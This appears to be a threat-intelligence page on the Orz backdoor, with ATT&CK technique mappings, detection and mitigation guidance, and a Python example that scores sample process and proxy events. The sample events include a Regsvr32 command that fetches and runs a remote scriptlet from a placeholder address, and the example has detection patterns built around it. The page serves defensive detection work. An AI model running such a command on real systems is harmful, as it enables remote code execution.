S0229: Orz
Analyst context for executives and security teams
Orz matters because it is a custom JavaScript backdoor for Windows associated in ATT&CK with Leviathan and with historical spearphishing activity that delivered it through Microsoft Publisher files. For leaders, the defensive value is not the malware name but the behavior pattern: script-based backdoor execution, host discovery, Registry interaction, tool transfer, command-and-control over ordinary web services, and defense evasion (obfuscated strings, Registry overwrites that reduce visibility, Regsvr32 proxy execution, process hollowing) that can keep a compromised workstation useful for longer-running espionage activity.
Executive priority
Prioritize validation around Windows endpoint visibility, email/file handling for uncommon document delivery paths, and incident response readiness for backdoor activity that performs discovery and uses legitimate-looking system utilities. Because ATT&CK provides no official detection guidance for Orz, executives should ask whether coverage is behavior-based across the mapped techniques rather than dependent on a malware signature or a dated campaign indicator.
Technical view
SOC and IR teams should treat Orz as a Windows malware object whose mapped techniques cover execution, discovery, command-and-control, ingress tool transfer, Registry modification, and defense evasion (obfuscation, indicator removal, Regsvr32 proxy execution, process hollowing). Validate telemetry for command shell use, Regsvr32 execution, Registry modification, process discovery, system/network/file/software discovery, process hollowing indicators, ingress file transfer, and bidirectional web-service communication. Detection engineering should map alerts to the related ATT&CK techniques rather than relying on the Orz name alone.
Likely telemetry
- Windows process creation and command-line logging, especially cmd.exe and regsvr32.exe activity
- Endpoint detection data for script execution, process injection or process hollowing patterns, and suspicious parent-child process relationships
- Windows Registry modification events
- File creation, file download, and tool transfer evidence on endpoints
- DNS, proxy, firewall, and web traffic logs for external bidirectional communication patterns
Detection direction
- Build or validate behavior detections for the related techniques: T1059.003, T1218.010, T1112, T1055.012, T1102.002, T1105, T1016, T1057, T1082, T1083, T1518, T1027, and T1070.
- Tune for legitimate administrative use of cmd.exe, regsvr32.exe, registry tools, and discovery commands; the detection value is in unusual context, sequencing, parent process, destination, and user/system baseline deviation.
- Do not assume Orz-specific signatures are sufficient. ATT&CK does not provide official detection text for this object, so local validation should focus on whether the environment can observe the mapped behaviors.
- Check for blind spots around script content visibility, obfuscated files, signed Windows utility abuse, endpoint memory telemetry for hollowing, and network channels that blend into ordinary web traffic.
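The sequencing and parent-process logic described above, worked through as an added example that is not part of the page, of ATT&CK, or of the Proofpoint reporting. It runs a small set of behavior rules over constructed Sysmon-style process creation and proxy events: a script host (wscript.exe, cscript.exe, mshta.exe) spawning cmd.exe or regsvr32.exe (T1059.003, T1218.010); regsvr32.exe loading a remote scriptlet or scrobj.dll, which is a generic Regsvr32-abuse check rather than something the page attributes to Orz; three or more distinct discovery techniques issued under one parent (T1016, T1057, T1082, T1083, T1518); and a script host talking to a paste or forum-style web service (T1102.002). Host names, command lines, regexes, rule weights and the threshold are all assumptions chosen for illustration; the benign ADMIN-01 events show the tuning point that legitimate cmd.exe, regsvr32.exe and discovery use should stay quiet.

```python
import re
from collections import defaultdict

# Constructed sample telemetry in a Sysmon-like shape (illustrative, not real logs).
SAMPLE_EVENTS = [
    # WS-1042: script host drives cmd.exe, regsvr32 loads a scriptlet,
    # a discovery burst, and dead-drop style web-service C2.
    {"type": "process", "host": "WS-1042", "parent": "wscript.exe", "image": "cmd.exe",
     "cmdline": "cmd.exe /c tasklist /v"},
    {"type": "process", "host": "WS-1042", "parent": "wscript.exe", "image": "cmd.exe",
     "cmdline": "cmd.exe /c systeminfo"},
    {"type": "process", "host": "WS-1042", "parent": "wscript.exe", "image": "cmd.exe",
     "cmdline": "cmd.exe /c reg query \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\" /v ProxyServer"},
    {"type": "process", "host": "WS-1042", "parent": "wscript.exe", "image": "regsvr32.exe",
     "cmdline": "regsvr32.exe /s /n /u /i:http://198.51.100.7/p.sct scrobj.dll"},
    {"type": "network", "host": "WS-1042", "image": "wscript.exe", "dest": "pastebin.com"},
    # ADMIN-01: legitimate administration that must not fire.
    {"type": "process", "host": "ADMIN-01", "parent": "explorer.exe", "image": "cmd.exe",
     "cmdline": "cmd.exe /c tasklist"},
    {"type": "process", "host": "ADMIN-01", "parent": "msiexec.exe", "image": "regsvr32.exe",
     "cmdline": "regsvr32.exe /s \"C:\\Program Files\\Vendor\\vendor.dll\""},
    {"type": "network", "host": "ADMIN-01", "image": "chrome.exe", "dest": "pastebin.com"},
]

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe"}
PROXY_BINARIES = {"cmd.exe", "regsvr32.exe"}
# Assumed web services for the T1102.002 rule; the page names Technet and Pastebin pages.
DEAD_DROP_HOSTS = {"pastebin.com", "social.technet.microsoft.com"}
# Remote scriptlet (/i:http...) or scrobj.dll loading: generic Regsvr32 abuse, not Orz-specific.
SCRIPTLET = re.compile(r"/i:\s*https?://|scrobj\.dll", re.I)
# Command-line fragments mapped to the discovery techniques the page lists (assumed patterns).
DISCOVERY_PATTERNS = {
    "T1057": re.compile(r"\btasklist\b", re.I),
    "T1082": re.compile(r"\b(systeminfo|ver)\b", re.I),
    "T1016": re.compile(r"ProxyServer|\bnetsh\b.*\bproxy\b", re.I),
    "T1083": re.compile(r"\bdir\b|\bfsutil\b", re.I),
    "T1518": re.compile(r"Internet Explorer", re.I),
}
DISCOVERY_BURST = 3  # distinct discovery techniques under one parent before it counts
WEIGHTS = {
    "script_host_spawns_proxy": 3,
    "regsvr32_scriptlet_or_scrobj": 4,
    "script_host_dead_drop": 3,
    "discovery_burst": 3,
}


def analyze(events):
    """Return {host: {"score": int, "hits": [(rule, technique, detail), ...]}}.
    The score sums the weight of each distinct rule that fired on a host, so a
    repeated behaviour does not inflate the score; distinct behaviours do."""
    findings = defaultdict(list)
    discovery = defaultdict(dict)  # (host, parent) -> {technique: cmdline}
    for ev in events:
        host = ev["host"]
        if ev["type"] == "process":
            parent, image, cmd = ev["parent"].lower(), ev["image"].lower(), ev["cmdline"]
            # Parent-process context: script host launching a proxy-execution binary.
            if parent in SCRIPT_HOSTS and image in PROXY_BINARIES:
                tech = "T1218.010" if image == "regsvr32.exe" else "T1059.003"
                findings[host].append(("script_host_spawns_proxy", tech, f"{parent} -> {cmd}"))
            # Command-line context: regsvr32 pulling a scriptlet or loading scrobj.dll.
            if image == "regsvr32.exe" and SCRIPTLET.search(cmd):
                findings[host].append(("regsvr32_scriptlet_or_scrobj", "T1218.010", cmd))
            # Sequencing context: collect discovery commands per parent for the burst rule.
            for tech, pat in DISCOVERY_PATTERNS.items():
                if pat.search(cmd):
                    discovery[(host, parent)][tech] = cmd
        elif ev["type"] == "network":
            # Destination context: only a script host reaching a dead-drop style service is odd.
            if ev["image"].lower() in SCRIPT_HOSTS and ev["dest"].lower() in DEAD_DROP_HOSTS:
                findings[host].append(("script_host_dead_drop", "T1102.002",
                                       f'{ev["image"]} -> {ev["dest"]}'))
    for (host, parent), techs in discovery.items():
        if len(techs) >= DISCOVERY_BURST:
            findings[host].append(("discovery_burst", "+".join(sorted(techs)),
                                   f"{parent} issued {len(techs)} distinct discovery commands"))
    return {
        host: {"score": sum(WEIGHTS[r] for r in {h[0] for h in hits}), "hits": hits}
        for host, hits in findings.items()
    }


def triage(events, threshold=6):
    """Hosts whose combined behaviour score meets the threshold, highest first."""
    report = analyze(events)
    return sorted((h for h, r in report.items() if r["score"] >= threshold),
                  key=lambda h: -report[h]["score"])


if __name__ == "__main__":
    for host in triage(SAMPLE_EVENTS):
        print(host, analyze(SAMPLE_EVENTS)[host]["score"])
        for rule, tech, detail in analyze(SAMPLE_EVENTS)[host]["hits"]:
            print("  ", rule, tech, detail)
```

The point of the weighting is the one the bullet list makes: no single rule is a conviction. A lone regsvr32.exe launch from an installer, a single tasklist, or a browser visiting a paste site each stays below the threshold; the same behaviours chained under a script-host parent on one workstation cross it.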
Mitigation priorities
- Start with visibility: ensure Windows endpoint, command-line, registry, file, email attachment, and network web/proxy telemetry are retained and searchable for investigations.
- Reduce execution risk from script and document-borne payloads through controlled handling of high-risk attachment types and enforcement of least privilege on workstations.
- Harden and monitor legitimate Windows utilities that can proxy execution, including Regsvr32 and command shell use, without assuming they can be fully blocked in all environments.
- Apply least privilege and change-control discipline around Registry locations that backdoors modify for defense evasion (the page maps Registry overwrites used to reduce visibility) and that persistence mechanisms commonly rely on.
- Prepare IR playbooks for backdoor cases that include scoping discovery activity, reviewing inbound tool transfers, and reconstructing command-and-control communications.
Analyst notes and limits
The most decision-relevant context is that Orz is a custom JavaScript backdoor used by Leviathan, observed historically in 2014 and in August 2017 when dropped by Microsoft Publisher files. ATT&CK relationships show a broad behavior set that should be used to guide control validation and detection coverage testing.
The supplied ATT&CK object does not include official detection guidance, aliases, labels, or object-level tactics. The relationship techniques provide behavioral direction, but environment-specific evidence is required to determine exposure, alert quality, and incident significance. No active exploitation or current campaign activity should be inferred from these fields alone.
Orz
How security teams should use this page
Treat this object as behavior context, not an attribution claim. Validate the related groups, software, data sources, and mitigations against official ATT&CK relationships and your own telemetry before making control-coverage decisions.
Techniques used
This mirrors the MITRE pattern of making group, software, campaign, and technique relationships scannable. Relationship notes come from mirrored ATT&CK relationship text when available.
| Domain | ID | Name | Relationship / procedure |
|---|---|---|---|
| Enterprise | T1083 | File and Directory Discovery | Orz can gather victim drive information. [1] |
| Enterprise | T1059.003 | Command and Scripting Interpreter: Windows Command Shell | |
| Enterprise | T1218.010 | System Binary Proxy Execution: Regsvr32 | Some Orz versions have an embedded DLL known as MockDll that uses Process Hollowing and regsvr32 to execute another payload. [1] |
| Enterprise | T1102.002 | Web Service: Bidirectional Communication | Orz has used Technet and Pastebin web pages for command and control. [1] |
| Enterprise | T1057 | Process Discovery | Orz can gather a process list from the victim. [1] |
| Enterprise | T1082 | System Information Discovery | Orz can gather the victim OS version and whether it is 64 or 32 bit. [1] |
| Enterprise | T1070 | Indicator Removal | Orz can overwrite Registry settings to reduce its visibility on the victim. [1] |
| Enterprise | T1518 | Software Discovery | Orz can gather the victim's Internet Explorer version. [1] |
| Enterprise | T1105 | Ingress Tool Transfer | Orz can download files onto the victim. [1] |
| Enterprise | T1112 | Modify Registry | Orz can perform Registry operations. [1] |
| Enterprise | T1016 | System Network Configuration Discovery | Orz can gather victim proxy information. [1] |
| Enterprise | T1055.012 | Process Injection: Process Hollowing | Some Orz versions have an embedded DLL known as MockDll that uses Process Hollowing and regsvr32 to execute another payload. [1] |
| Enterprise | T1027 | Obfuscated Files or Information | Some Orz strings are base64 encoded, such as the embedded DLL known as MockDll. [1] |
Groups, software, and campaigns
G0065: Leviathan
Leviathan is a Chinese state-sponsored cyber espionage group that has been attributed to the Ministry of State Security's (MSS) Hainan State Security Department and an affiliated front company.[1] Active since at least 2009, Leviathan has targeted the following sectors: academia, aerospace/aviation, biomedical, defense industrial base, government, healthcare, manufacturing, maritime, and transportation across the US, Canada, Australia, Europe, the Middle East, and Southeast Asia.[1][2][3][4]
All related ATT&CK context
Object version and sync metadata
The fields below describe the current mirrored snapshot. When Glexia retains multiple ATT&CK source imports, you can open the table to compare the same object across releases (hashes and MITRE timestamps). For MITRE's own release notes and roadmap, see ATT&CK resources: Updates.
Imported snapshots across ATT&CK releases (1)
| Release | Bundle imported | Object version | Modified | Status | Raw hash |
|---|---|---|---|---|---|
| 19.1 | | 2.2 | | Current bundle | 7e28c3fc159d… |
Mirrored ATT&CK source object
The raw object is retained through the mirrored ATT&CK source bundle and object hash. The raw endpoint returns the exact object from the mirrored bundle when available.
External references and citations
MITRE external references are preserved separately from Glexia analysis so citations remain traceable to their original source records.
- [1] Proofpoint Leviathan Oct 2017: Axel F, Pierre T. (2017, October 16). Leviathan: Espionage actor spearphishes maritime and defense targets. Retrieved February 15, 2018.
- [2] FireEye Periscope March 2018: FireEye. (2018, March 16). Suspected Chinese Cyber Espionage Group (TEMP.Periscope) Targeting U.S. Engineering and Maritime Industries. Retrieved April 11, 2018.
- [3] AIRBREAK (Citation: FireEye Periscope March 2018)
- [4] Orz (Citation: Proofpoint Leviathan Oct 2017)
- [5] mitre-attack S0229
Source: MITRE ATT&CK®. © 2026 The MITRE Corporation. This work is reproduced and distributed with the permission of The MITRE Corporation. MITRE ATT&CK and ATT&CK are registered trademarks of The MITRE Corporation. Glexia is not affiliated with or endorsed by MITRE.